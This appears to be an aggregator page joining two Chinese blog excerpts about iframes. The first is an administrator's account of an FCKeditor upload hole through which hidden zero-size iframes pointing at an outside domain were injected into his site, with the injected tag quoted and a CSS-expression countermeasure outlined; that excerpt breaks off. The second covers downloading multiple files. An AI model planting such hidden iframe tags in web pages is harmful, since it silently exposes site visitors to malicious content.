iframe

今天一上服务器2000多个 <iframe src="http://ca.winvv.com/cn.htm" width=0 height=0></iframe> 被 注入 ，我晕！检查了半天，原来是 FckEditor编辑器上传漏洞导致 。在找资料的同时，发现CSS有一个有趣的属性 expression , 发现这个东东还有点意思，由此写出来，“以儆效尤”！ 引用：“ IE5 及其以后版本支持在CSS中使用expression，用来把CSS属性和JavaScript脚本关联起来，这里的CSS属性可以是元素固有的属性，也可以是自定义属性。就是说CSS属性后面可以是一段JavaScript表达式，CSS属性的值等于Javascript表达式执行的结果。在表达式中可以直接 引用元素自身的属性和方法，也可以使用其他浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。 ”我的理解是： expression后面接js表达式执行相关操作 格式： （1）标记固有的CSS属性名:expression(JS表达式); （2）自定义属性名:expression(JS表达式); 使用JS销毁iframe对象原理： 使iframe里的请求地址变成空白页(about:blank)，再将iframe对象从DOM（文档对象模型）中移除就可以切断所有iframe里的请求了。 CSS代码： iframe

一次下载多个文件的解决思路(iframe) - Eric 真实经历 最近开发项目需要做文件下载，想想挺简单的，之前也做过，后台提供下载接口，前端使用 window.location.href 就行了呗。不过开发的时候发现，有些文件有附属文件，点击 下载按钮 需要下载两个文件，而且不能使用压缩包的形式。想想不是也挺简单，点击 下载 发送两个下载请求不就搞定了么。 说干就干，三下五除二就写好了，当点击 下载 的那一刻懵逼了， 第一个请求竟然自动Cancelled了，顿时一万个草泥马崩腾而过(因为是国外服务器，下载比较慢导致第一个请求被Cancelled)，这就意味着快速点击不同的 下载 按钮也会有同样的问题，这不行啊，然后开始了自己的下载探索之旅。 a标签 & location.href 我们知道a标签及href指向的如果是一个下载链接，那么相当于下载文件，对于单文件下载还是ok的，不过快速点击几个下载按钮，有的下载会被Cancelled，这可不行，继续百度。 上一段代码： const download = (url)=>{ window.location.href = url; } window.open 我们知道window.open可以打开一个新窗口，那么是不是可以实现下载呢，激动的我赶紧试了试，下载的确可以，不过会快速打开一个新窗口并且关闭，体验非常不好，果断放弃了。